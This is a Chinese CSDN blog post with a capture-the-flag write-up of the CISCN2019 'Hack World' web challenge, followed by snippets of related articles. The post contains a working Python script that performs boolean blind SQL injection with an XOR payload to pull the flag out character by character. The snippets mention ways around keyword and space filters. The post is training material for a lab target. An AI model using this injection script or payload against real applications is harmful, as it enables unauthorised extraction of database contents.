[CISCN2019 华北赛区 Day2 Web1] web题-Hack World

最新推荐文章于 2024-06-05 15:00:00 发布
最新推荐文章于 2024-06-05 15:00:00 发布
阅读量347 收藏 1
点赞数
分类专栏: CTF练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/107199187
版权

复现环境:buuoj.cn

在这里插入图片描述
输入0:Error Occured When Fetch Result.
输入1:Hello, glzjin wants a girlfriend.
输入2:Do you want to be my girlfriend?
输入3:Error Occured When Fetch Result.

题目提示信息说表名和字段名都是flag,给出id就能得到flag

脚本如下

import requests
import time
import re
url=''
flag = ''
for i in range(1,43):
    max = 127
    min = 0
    for c in range(0,127):
        s = (int)((max+min)/2)
        payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
        r = requests.post(url,data = {'id':payload})
        time.sleep(1)
        if 'Hello, glzjin wants a girlfriend.' in str(r.content):
            max=s
        else:
            min=s
        if((max-min)<=1):
            flag+=chr(max)
            break
print(flag)
#填写自己环境的url

在这里插入图片描述

BROTHERYY
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_46266956的博客
04-24 616
[CISCN2019 华北赛区 Day2 Web1]Hack World 注入: 直接抓包burpsuite fuzz测试 过滤了一些关键字,但能够看出来存在bool漏洞 发现当true时,Helloglzjin wants a girlfriend. fslse时,Error Occured When Fetch Result. 据此,写脚本 import requests import string import time timeout=None def bool_blind(url):
[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_52843575的博客
04-07 3273
[CISCN2019 华北赛区 Day2 Web1]Hack World解 判断类型 进入页面很明显就是考sql注入,与此同时页面直接告诉你表面和列名均是flag,直接开始注入,常用的注入函数均被过滤,直接fuzz爆破,查看被过滤的具体情况 结果确定此为sql中的布尔盲注(post传参),也同时发现一个问,请求过快时,会被过滤掉请求 确认绕过方法 因为or被过滤,百度一波后,发现可以使用^异或来绕过 异或:相同为假,相异为真,简单来说就是 1^1=0 0^0=0 1^0=1 空格也被过滤,因此
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_74911687的博客
03-03 591
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
FUZZ目讲解
qq_46540840的博客
04-28 2986
FUZZ讲解 文章目录FUZZ讲解前言使用方法补充知识点构造的代码 前言 何为Fuzz简单来说就是模糊测试 模糊测试(fuzz testing)是一种介于完全的手工渗透测试与完全的自动化测试之间的安全性测试类型 就是一遍一遍的去尝试 使用方法 拿buuctf 一道注入来说 [CISCN2019 华北赛区 Day2 Web1]Hack World 输入1,2,3 分别有不同显示内容分别是 Hello, glzjin wants a girlfriend Do you want to be my gi
[CISCN2019 华北赛区 Day2 Web1]Hack World1
最新发布
2301_78919866的博客
06-05 665
[CISCN2019 华北赛区 Day2 Web1]Hack World1
BUUCTF闯关日记--[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_64201116的博客
05-22 349
可恶,明明当初想着是写给自己看的,文章越写越多,越来越在意别人会不会看我的文章了,还是太功名利禄了,我得清高点(这是写给自己看,这是写给自己看,这是写给自己看) 进入页面,可以看到只有一个白框,多半是SQL注入 直接开始做 输入:1 回显:Hello, glzjin wants a girlfriend. 输入:2 回显:Do you want to be my girlfriend? 判断一下是否存在sql注入 分别输入 1+1 2-1 1*1 2/2 //只有2/2有运算后的
【CTF-web】buuctf-[CISCN2019 华北赛区 Day2 Web1]Hack World(sql盲注)
Sankkl1的博客
08-18 445
根据上图可知,页面中已经告诉我们要从flag表中的flag列取出flag,思考是sql注入。经过抓包发现发post包中的id字段是注入点。同时还发现是盲注,即当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果。由此可以通过if函数来测试flag每一位的值,以下为编写的测试脚本。经测试当输入id=1时,结果为。,发现过滤了空格、#等符号。,当id=2时,结果为。
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
国赛 2019 华北赛区 Web
05-19
ciscn
利用PHAR协议进行PHP反序列化攻击1
08-03
在某些网络安全竞赛(如[CISCN2019华北赛区 Day1 Web1]Dropbox)中,攻击者可能利用PHAR反序列化漏洞来实现文件读取或执行其他操作。例如,通过上传一个伪装成图片的PHAR文件,然后更改其后缀,使得PHP尝试解析它。...
华北电力大学高等数学期末考试2018-2019第2学期(A).pdf
06-06
1. 向量与模长计算:考试目中出现的“连接点(1,1,1),MA(2,2,1)”涉及的是三维空间中两点之间的向量表示,计算其模长是基础数学运算。 2. 方向导数:函数的方向导数表示函数在某一方向上的变化率,计算时需要用到...
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 目分析与详解
2302_79800344的博客
02-28 1763
【代码】[CISCN2019 华北赛区 Day2 Web1]Hack World 1 目分析与详解。
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
m_de_g的博客
04-22 680
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全目,要求我们通过访问网站,获取到flag。 目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值